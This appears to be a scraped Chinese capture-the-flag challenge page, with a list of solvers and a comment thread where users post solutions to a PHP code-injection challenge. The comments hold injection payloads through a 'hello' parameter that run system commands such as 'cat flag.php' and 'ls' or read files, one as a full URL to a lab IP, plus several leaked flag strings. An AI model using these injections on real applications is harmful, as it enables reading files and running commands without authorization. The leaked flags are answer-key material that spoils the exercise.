评分(9)
解题动态

testda 攻破了该题 1小时前

satuo 攻破了该题 1小时前

goeasy 攻破了该题 5小时前

867736371 攻破了该题 5小时前

废柴小白 攻破了该题 5小时前

19893123836 攻破了该题 6小时前

tcg979 攻破了该题 18小时前

AX渊仪 攻破了该题 23小时前

qwerfsafafa 攻破了该题 23小时前

太水了410410 攻破了该题 23小时前

6145 攻破了该题 1天前

zer0_h 攻破了该题 1天前

Hehe0619 攻破了该题 1天前

李嘉欣a 攻破了该题 1天前

嗨客111 攻破了该题 1天前

呆羊 攻破了该题 1天前

ahco 攻破了该题 1天前

17365797718 攻破了该题 1天前

你猜呀啊哈哈 攻破了该题 1天前

评论
wangyihao 1年前
举报
hello=system("cat flag.php")
18092952956 1年前
举报
show_source('flag.php')
BlueL1ght 1年前
举报
system("cat+flag.php")
zhuleixy 1年前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 1年前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 1年前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 1年前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 1年前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
马踏黄河两岸 1年前
举报
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php
lilifanqian 1年前
举报
flag{4cadd25b49840f0cdb999cdabc86b103}